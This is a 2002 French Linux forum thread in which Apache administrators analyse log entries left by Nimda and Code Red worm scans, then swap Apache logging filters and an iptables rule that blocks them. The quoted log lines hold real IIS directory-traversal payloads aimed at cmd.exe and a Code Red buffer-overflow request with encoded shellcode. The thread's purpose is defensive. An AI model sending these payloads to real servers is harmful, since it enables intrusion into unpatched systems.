marre des petits cons ... - Linux et OS Alternatifs
Marsh Posté le 04-10-2002 à 13:08:54
Fake ????
C'est nimda le petit con en kestion, et lui il s'en fou que ce soit apache, vu qu'il prend une IP au hazard
Marsh Posté le 04-10-2002 à 13:12:29
J'y ai pensé, mais ça m'etonnerai. Ils essayent généralement plusieurs trucs et pas toujours les mêmes. Y'a des variantes
ils essayent de remonter sur différents niveaux. et avec des intervalles de plusieurs minutes.
Je suis quasi sur que ce sont des nerds.
Marsh Posté le 04-10-2002 à 13:19:54
80.11.163.246 - - [04/Oct/2002:10:26:49 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:26:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:26:57 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:10 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:18 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:24 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:34 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir H
TTP/1.0" 404 336 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 336 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:19 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
61.56.131.38 - - [04/Oct/2002:10:45:08 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u
cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:29 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:30 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:31 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:32 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:33 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:33 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:43 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTT
P/1.0" 404 336 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:47 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:48 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:48 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:49 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
Marsh Posté le 04-10-2002 à 13:20:18
non, c'est nimda.. ca fait un an que mes logs en sont pleins, tu veux que je te les balances.. c'est humainement impossible de fazire ca a la main
Marsh Posté le 04-10-2002 à 13:21:13
Vi pareil pour moi...
Chiantissime quand tu cherches les vraies erreurs.
Marsh Posté le 04-10-2002 à 13:22:46
j0s3 a écrit a écrit : Vi pareil pour moi... Chiantissime quand tu cherches les vraies erreurs. |
y'a des scripts pour epurer les logs remplis d'alerte nimda et autres...
Marsh Posté le 04-10-2002 à 13:24:19
Parano a écrit a écrit : 61.56.131.38 - - [04/Oct/2002:10:45:08 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-" |
il essaye un buffer overflox là ?
Marsh Posté le 04-10-2002 à 13:25:38
Je croyais que nimda n'infectait que les serveurs IIS.
Si il n'y a pas de serveur sur l'addresse IP du demamdeur, c'est que c'est autre chose. Non ?
Si tu as raison la quantité de serveurs IIS infectée est colosale. Et M$ dans ce cas est très fort, ils arrivent a m'emmerder quand même avec leurs vulnérabilités. p'tain
Marsh Posté le 04-10-2002 à 13:27:09
Nimda et Red code, c pas souvent volontaire mais des machines infectées.
Mets ça dans ton httpd.conf :
SetEnvIf Request_URI "\.exe$" nolog
SetEnvIf Request_URI "\.ida$" nolog
CustomLog /rep/acces.log combined env=!nolog
ça t'évitera ça ( tu peux faire plus évolué pour les expressions regulières si tu veux loguer tes .exe à toi tout de même )
Marsh Posté le 04-10-2002 à 13:27:48
minusplus a écrit a écrit : il essaye un buffer overflox là ? |
Ca c'est Code Red
Marsh Posté le 04-10-2002 à 13:28:21
En parlant de ca il est temps d'upgrader apache les gars
Il y a 2/3 joyeusetes dont une vient d'etre corrigees....
Marsh Posté le 04-10-2002 à 13:29:08
minusplus a écrit a écrit : il essaye un buffer overflox là ? |
C jolie comme expression nan ?
Marsh Posté le 04-10-2002 à 13:29:13
Citation : Nimda et Red code, c pas souvent volontaire mais des machines infectées. |
Merci, ça va soigner mon ulcère
Marsh Posté le 04-10-2002 à 13:29:54
mean a écrit a écrit : En parlant de ca il est temps d'upgrader apache les gars Il y a 2/3 joyeusetes dont une vient d'etre corrigees.... |
Moi j'ai tout fait entre 8h et 9h, je suis tranquille
Marsh Posté le 04-10-2002 à 13:30:39
j0s3 a écrit a écrit : Je croyais que nimda n'infectait que les serveurs IIS. |
Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein
Marsh Posté le 04-10-2002 à 13:33:15
Parano a écrit a écrit : C jolie comme expression nan ? |
wé bon overflow koi !
Marsh Posté le 04-10-2002 à 13:34:33
Citation : Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein |
Yaisse, mais je pense Nerd si l'addresse demandeuse de la requête n'est pas un serveur oueb.
Si en face ca ne répond pas à une requête http, c'est que c'est ni Nimda, ni Code Red. Mais un des petits cons en question
Marsh Posté le 04-10-2002 à 13:37:17
j0s3 a écrit a écrit :
|
A un moment je loggais à part ce genre de requêtes de merde pour faire des stats. Si tu commences à vouloir tester toutes les IP de ce genre de requêtes, tu vas pouvoir y passer des heures tu sais
Marsh Posté le 04-10-2002 à 13:38:01
j0s3 a écrit a écrit :
|
c'est peut-être un gars qui sait pas configurer convenablement son firewall
Marsh Posté le 04-10-2002 à 13:39:05
Citation : A un moment je loggais à part ce genre de requêtes de merde pour faire des stats. Si tu commences à vouloir tester toutes les IP de ce genre de requêtes, tu vas pouvoir y passer des heures tu sais |
Je suis motivé
Je leur veut du mal, beaucoup de mal
Marsh Posté le 04-10-2002 à 13:42:28
j0s3 a écrit a écrit :
|
Bah ils ont un IIS pourri qui en plus est verrolé, je vois pas comment ils peuvent se faire plus mal
Marsh Posté le 04-10-2002 à 13:45:25
Citation : Bah ils ont un IIS pourri qui en plus est verrolé, je vois pas comment ils peuvent se faire plus mal |
T'as raison, mais bon font chier avec leurs daubes. A un moment l'incompétence rejoint la malveillance.
Marsh Posté le 04-10-2002 à 13:49:26
pour les failles de secu sur apache g opte pour la version 2.0.40 qui est stable depuis 20 jours chez moi sinon y'a un moyen de pas avoir ca dans les log avec une ptite regle iptables si quelqu'un pouvait la mettre ca serait cool de sa part
@++
Marsh Posté le 04-10-2002 à 13:52:39
aurelboiss a écrit a écrit : pour les failles de secu sur apache g opte pour la version 2.0.40 qui est stable depuis 20 jours chez moi sinon y'a un moyen de pas avoir ca dans les log avec une ptite regle iptables si quelqu'un pouvait la mettre ca serait cool de sa part @++ |
Bah non, parce qu'iptables gère des conditions sur l'IP ou le port ou alors sur les paquets ( taille, type, nombre ). Mais là comme ce sont des requêtes HTTP normales de tas d'IP différentes, tu peux rien faire avec iptables, surtout que ça n'a rien à voir avec le log.
La meilleure solution reste donc de les ignorer dans la config apache
Marsh Posté le 04-10-2002 à 13:55:34
iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK,PSH ACK,PSH --dport 80 -m string --string '/default.ida?' -j REJECT --reject-with tcp-reset
Ca demande le string match
Marsh Posté le 04-10-2002 à 13:57:18
kadreg a écrit a écrit : iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK,PSH ACK,PSH --dport 80 -m string --string '/default.ida?' -j REJECT --reject-with tcp-reset Ca demande le string match |
ça marche bien ça ?
Marsh Posté le 04-10-2002 à 13:59:47
Sly Angel a écrit a écrit : ça marche bien ça ? |
j'sais pas, j'ai pas testé, mais je me la garde en stock
Marsh Posté le 04-10-2002 à 13:06:34
Voila, pratiquement un quart de l'activité de mon serveur apache consiste en des petits cons qui essayent d'aller sur ../winnt/system32/cmd.exe.
Mon error log est quasi exclusivement consacrée a ce type de requete.
Ces imbéciles ne sont même pas capables de se rendre compte qu'ils ont affaire a un Linux/Apache et pas a un NT/IIS.
J'aimerai bien leur faire une sale blague, genre créer un ../winnt/system32/cmd.exe qui leur foutrait la frousse.
Quelqu'un sait il comment s'y prendre ?